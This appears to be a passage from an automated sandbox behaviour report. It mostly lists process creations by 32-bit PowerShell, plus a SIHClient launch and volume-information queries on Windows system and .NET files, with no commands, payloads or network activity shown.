Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv HhVnUyAsTUmprDuizOSkrg.0.2Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
